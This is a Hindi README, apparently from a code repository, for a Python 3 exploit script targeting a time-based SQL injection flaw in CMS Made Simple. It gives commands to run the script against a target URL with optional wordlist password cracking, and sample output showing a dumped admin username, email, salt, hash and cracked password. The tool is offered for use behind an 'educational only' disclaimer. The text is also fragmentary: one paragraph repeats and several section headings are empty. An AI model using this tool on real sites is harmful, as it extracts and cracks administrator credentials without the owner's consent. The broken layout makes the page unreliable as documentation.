
स्क्रिप्ट को टेमुर नोवरुज़ोव द्वारा Python 3 के साथ संगतता सुनिश्चित करने के लिए पुनः निर्मित किया गया है। यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। बिना अनुमति के किसी भी सिस्टम या नेटवर्क पर इस उपकरण का अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
स्क्रिप्ट को टेमुर नोव्रुज़ोव द्वारा Python 3 के साथ संगतता सुनिश्चित करने के लिए पुनः तैयार किया गया है। यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। किसी भी सिस्टम या नेटवर्क पर बिना अनुमति के इस उपकरण का अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
CMS Made Simple SQL Injection Exploit (Python 3) अवलोकन इस रिपॉजिटरी में एक Python 3 स्क्रिप्ट है जो CMS Made Simple में समय-आधारित SQL इंजेक्शन भेद्यता का शोषण करती है। स्क्रिप्ट को टेमुर नोव्रुज़ोव द्वारा Python 3 के साथ संगतता सुनिश्चित करने के लिए पुनः तैयार किया गया है।
विशेषताएँ
आवश्यकताएँ
pip install requests के माध्यम से स्थापित करें)उपयोग मूल उपयोग
python3 exploit.py -u http://target-uri
पासवर्ड क्रैकिंग के साथ
python3 exploit.py -u http://target-uri --crack
विकल्प
-u, --url: आधार लक्ष्य URL निर्दिष्ट करें (जैसे, http://10.10.10.100/cms)-c, --crack: वर्डलिस्ट का उपयोग करके पासवर्ड क्रैकिंग सक्षम करेंउदाहरण python3 exploit.py -u http://10.10.10.100/cms python3 exploit.py -u http://10.10.10.100/cms --crack
यह कैसे काम करता है
महत्वपूर्ण नोट्स
TIME उचित रूप से सेट किया गया है क्योंकि यह SQL इंजेक्शन समय-आधारित है।लेखक टेमुर नोव्रुज़ोव
लाइसेंस यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।
उदाहरण आउटपुट
[+] Salt for password found: abcdef [+] Username found: admin [+] Email found: [email protected] [+] Password found: 5f4dcc3b5aa765d61d8327deb882cf99 [] Now try to crack password [] Try: password [+] Password cracked: password
अस्वीकरण यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। किसी भी सिस्टम या नेटवर्क पर बिना अनुमति के इस उपकरण का अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।